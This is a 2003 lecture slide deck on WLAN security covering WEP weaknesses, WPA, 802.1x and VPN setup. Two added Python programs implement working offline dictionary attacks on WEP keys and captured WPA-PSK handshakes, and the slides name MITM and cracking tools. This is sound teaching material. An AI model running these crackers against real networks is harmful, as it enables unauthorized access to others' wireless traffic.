ITG Informationstagung "Wireless LAN"

WLAN Sicherheit

Prof. Dr. Andreas Steffen


Zürcher Hochschule Winterthur

16.09.03 / WLAN_Security.ppt / Seite 1


Contents
• WLAN Threats
• WLAN WEP Encryption
• WLAN WEP Key Derivation
• WLAN Security: WPA / IEEE 802.1x
• WLAN Security: Virtual Private Networks
• VPN Gateways and VPN Clients
• Summary


WLAN War Driving


WLAN War Driving using NetStumbler

• NetStumbler available from http://www.netstumbler.com
• Laptop or PDA platform, optionally equipped with GPS device


WLAN War Driving Map of Zurich

• >700 access points, a majority of them with disabled WEP encryption

Source:
Tages-Anzeiger, Oct. 14 2002


Cain Password Recovery Tool

• Cain available from http://www.oxid.it
• ARP poisoning, SSH and HTTPS man-in-the-middle attacks


Wired Equivalent Privacy (WEP)
[Diagram: 24-bit IV || 40- or 104-bit key -> RC4 PRNG -> keystream;
 (Payload || CRC32 ICV) XOR keystream -> Ciphertext, sent together with the IV in clear]

• "Weaknesses in the Key Scheduling Algorithm of RC4", published by S. Fluhrer, I. Mantin & A. Shamir in August 2001
• By collecting weak 24-bit Initialization Vectors, 104-bit RC4 keys can be cracked within hours or days depending on throughput.
• Attack implemented by AirSnort (http://airsnort.shmoo.com)
• Usually straight mapping of ASCII passwords into RC4 keys
• Weak passwords can be cracked with WepAttack, a brute-force dictionary attack tool written by ZHW students (http://wepattack.sourceforge.net)

WEP is weak and therefore next to useless !!!


WEP Key Derivation

• Usually 5 or 13 ASCII characters are directly mapped into a 40- or 104-bit WEP key.
• Strong WEP key: 26 random HEX symbols, not derived from a password.
• 104-bit WEP key from a truncated MD5 hash of an arbitrary-length passphrase.
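The following Python program is an added example, not code from the slides or from the WepAttack project. It puts the two WEP slides together: RC4 seeded with IV || key, the CRC32 integrity check value, the straight ASCII-to-key mapping and the MD5 passphrase mapping, and then the dictionary attack that the password-derived keys make possible. The MD5 variant assumes the widespread vendor scheme that repeats the passphrase into a 64-byte buffer before hashing (the slide only says "truncated MD5 hash"); the captured frame, the key "swiss" and the wordlist are constructed for the demonstration.

```python
"""WEP encryption and key derivation as on the WEP slides: RC4 seeded with
IV || key, CRC-32 ICV, 5/13-char ASCII keys or a truncated MD5 passphrase
key, and the WepAttack-style dictionary attack this makes possible."""
import hashlib
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling (KSA) followed by the PRGA; returns `length` bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def key_from_ascii(password: str) -> bytes:
    """Straight mapping: 5 or 13 ASCII characters become the 40- or 104-bit key."""
    if len(password) not in (5, 13):
        raise ValueError("ASCII WEP keys are exactly 5 or 13 characters long")
    return password.encode("ascii")


def key_from_passphrase_md5(passphrase: str) -> bytes:
    """104-bit key from a truncated MD5 of an arbitrary-length passphrase.
    Assumption: the common vendor variant that repeats the passphrase to fill
    a 64-byte buffer, hashes it and keeps the first 13 bytes."""
    raw = passphrase.encode("ascii")
    if not raw:
        raise ValueError("empty passphrase")
    buf = (raw * (64 // len(raw) + 1))[:64]
    return hashlib.md5(buf).digest()[:13]


def _icv(payload: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the payload, little-endian."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, payload: bytes) -> bytes:
    """Frame body = IV (3 bytes, in clear) || KeyID || (payload || ICV) XOR RC4(IV || key)."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("IV must be 24 bits, key 40 or 104 bits")
    plain = payload + _icv(payload)
    ks = rc4_keystream(iv + key, len(plain))
    return iv + b"\x00" + bytes(p ^ k for p, k in zip(plain, ks))


def wep_decrypt(key: bytes, frame: bytes):
    """Return the payload if the ICV verifies under `key`, otherwise None."""
    iv, body = frame[:3], frame[4:]
    ks = rc4_keystream(iv + key, len(body))
    plain = bytes(c ^ k for c, k in zip(body, ks))
    payload, icv = plain[:-4], plain[-4:]
    return payload if _icv(payload) == icv else None


def dictionary_attack(frame: bytes, wordlist):
    """Turn each word into keys the way an access point would (ASCII mapping
    when it is 5 or 13 characters, MD5 passphrase mapping always) and accept
    the first key whose ICV verifies.  Returns (method, word, key) or None."""
    for word in wordlist:
        candidates = [("md5", key_from_passphrase_md5(word))]
        if len(word) in (5, 13):
            candidates.insert(0, ("ascii", key_from_ascii(word)))
        for method, key in candidates:
            if wep_decrypt(key, frame) is not None:
                return method, word, key
    return None


# Constructed sample, not a real capture: an AP configured with the ASCII
# key "swiss"; the payload starts with the LLC/SNAP header of a data frame.
SAMPLE_FRAME = wep_encrypt(key_from_ascii("swiss"), b"\x01\x02\x03",
                           b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"constructed IP datagram")
WORDLIST = ["secret", "zurich", "wireless12345", "swiss", "password"]

if __name__ == "__main__":
    print(dictionary_attack(SAMPLE_FRAME, WORDLIST))
```

A single frame is enough for the check because a wrong key leaves a random ICV, which verifies with probability 2^-32 only; WepAttack additionally compares the decrypted start of the payload against the known LLC/SNAP header to rule out even that.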


How to secure a WLAN?


Wi-Fi Protected Access (WPA)
● Temporal Key Integrity Protocol (TKIP)
  • Increased length of the Initialization Vector (IV).
  • Each WLAN packet is cryptographically secured by a Message Integrity Check (MIC).
  • Periodic re-keying (e.g. every hour).
● Extensible Authentication Protocol (EAP)
  • The IEEE 802.1x protocol controls network access.
  • EAP-TLS and Protected EAP (PEAP), respectively, authenticate WLAN users via a RADIUS authentication server.
  • In the low-end SOHO area security will still be based on passwords stored in the access point => Dictionary Attacks!
● WPA is a makeshift solution
  • WPA is a forward-compatible subset of the forthcoming IEEE 802.11i WLAN security standard.
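The dictionary attack the slide warns about for password-based ("pre-shared key") WPA works offline against a captured 4-way handshake. The Python program below is an added example, not code from the slides; the key hierarchy it follows is the one of WPA / IEEE 802.11i (PBKDF2 passphrase-to-PMK, PRF-512 to the PTK, HMAC-MD5 MIC over the EAPOL-Key frame in the TKIP key descriptor version). The SSID "ZHW-WLAN", the MAC addresses, the nonces, the EAPOL bytes and the passphrase "winterthur" are constructed, not sniffed.

```python
"""WPA-PSK, the "poor man's WPA" of the slide: the PMK is derived from a
passphrase stored in the access point, so a captured 4-way handshake can be
attacked offline with a dictionary.  Added example, not from the slides; key
hierarchy per IEEE 802.11i/WPA (PBKDF2 -> PMK, PRF-512 -> PTK, KCK -> MIC)."""
import hashlib
import hmac


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (512 bits for TKIP) = PRF-512(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes are the KCK that keys the EAPOL-Key MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA/TKIP (key descriptor version 1): MIC = HMAC-MD5(KCK, EAPOL-Key frame
    with its 16-byte MIC field set to zero)."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.md5).digest()


def make_handshake(passphrase: str) -> dict:
    """Constructed 4-way-handshake material (not a real capture): an attacker
    sniffs everything returned here except the passphrase it was built from."""
    hs = {
        "ssid": "ZHW-WLAN",                      # hypothetical network name
        "aa": bytes.fromhex("001122334455"),     # authenticator (AP) MAC, constructed
        "spa": bytes.fromhex("66778899aabb"),    # supplicant (client) MAC, constructed
        "anonce": bytes(range(32)),              # fixed nonces for reproducibility
        "snonce": bytes(range(32, 64)),
        # stand-in for EAPOL-Key message 2 with the MIC field zeroed; only the
        # bytes being authenticated matter for the attack
        "eapol_mic_zeroed": bytes.fromhex("0103005ffe010900") + bytes(87),
    }
    pmk = pmk_from_passphrase(passphrase, hs["ssid"])
    ptk = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(ptk[:16], hs["eapol_mic_zeroed"])
    return hs


def crack_psk(hs: dict, wordlist):
    """Offline dictionary attack: 4096 HMAC-SHA1 iterations per guess, but no
    further interaction with the network once the handshake is captured."""
    for word in wordlist:
        pmk = pmk_from_passphrase(word, hs["ssid"])
        ptk = derive_ptk(pmk, hs["aa"], hs["spa"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol_mic_zeroed"]), hs["mic"]):
            return word
    return None


# Constructed sample: the AP owner chose a dictionary word as passphrase.
SAMPLE_HANDSHAKE = make_handshake("winterthur")
WORDLIST = ["password", "letmein", "wireless", "winterthur", "zurich"]

if __name__ == "__main__":
    print(crack_psk(SAMPLE_HANDSHAKE, WORDLIST))
```

The SSID acts as the PBKDF2 salt and the 4096 iterations slow each guess down, which is why a long random passphrase survives this attack and a dictionary word does not; with EAP-TLS there is no shared passphrase to guess at all.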


IEEE 802.1x Port–Based Network Access Control

[Diagram: Supplicant (WLAN client) --EAP over Wireless (EAPOW)--> Authenticator (WLAN AP) --EAP over RADIUS--> Authentication Server (RADIUS).
 The AP exposes an uncontrolled port that passes only EAP traffic and a controlled port to the Intranet that is opened once authentication succeeds.]


IEEE 802.1x based on EAP-TLS
● Supported by Windows XP
● True security: mutual authentication with client and server certificates


IEEE 802.1x based on PEAP
● Supported by Windows XP
● Dictionary attacks! (password-based user authentication inside the TLS tunnel)


Virtual Private Networks

● Wireless VPN clients tunnel 100% of their IP traffic over the insecure air link using the peer network subnet mask 0.0.0.0/0.
● Strong encryption and authentication.

[Diagram: Wireless User (VPN Client) -> WLAN Access Point -> VPN Tunnel 0.0.0.0/0 -> DMZ Interface of the Intranet VPN Gateway / Firewall, which fronts the Private Intranet (Intranet Server) and the Internet.]


Linux FreeS/WAN as a VPN Gateway
• Available from www.freeswan.ca / www.strongsec.com
• Open-source IPsec stack for Linux systems
• X.509 certificate based authentication developed by ZHW!
• Easy installation via RedHat/SuSE/Debian/Mandrake RPMs
• Commercial CD-Firewall version available from www.astaro.de
• Number of VPN tunnels is limited only by hardware resources.
• Linux FreeS/WAN can also be used as a VPN client
• Simple configuration (the gateway is "left", any wireless client presenting a valid certificate is "right"):

    conn wlan
        right=%any
        rightrsasigkey=%cert
        rightsubnetwithin=10.3.0.0/16
        left=%defaultroute
        leftsubnet=0.0.0.0/0
        leftcert=gwCert.pem
        auto=add


Windows 2000/XP VPN Client
• Windows 2000/XP comes with a built-in IPsec stack
• Configuration via the mmc management console is tiresome!
• Open-source tool from http://vpn.ebootis.de loads a text-based configuration directly into the Windows registry:

    conn wlan
        left=%any                         # insert client IP
        right=10.3.0.1                    # gateway IP
        rightsubnet=*                     # home network
        rightca="C=CH,O=ZHW,CN=ZHW CA"    # certification authority
        network=lan                       # lan/ras/auto
        auto=start

• WLAN clients can tunnel their whole IP traffic to the VPN gateway


• Commercial VPN clients: SSH Sentinel, SafeNet/Soft Remote


Summary
● WLANs are extremely vulnerable, even with WEP encryption!
● Latest WLAN access point models are equipped with WPA.
● WPA mends the coarsest WEP security holes. The IEEE 802.11i WLAN security standard is still a long way off.
● WPA is secure only in conjunction with a RADIUS infrastructure and EAP-TLS authentication.
● The "poor man's" WPA solution will still be based on [weak] passwords.
● An efficient and cryptographically secure alternative is the use of an IPsec-based Virtual Private Network on top of WLAN.
● Low-cost VPN solutions for Linux, Windows and MacOS platforms are readily available.

Further information available from http://security.zhwin.ch
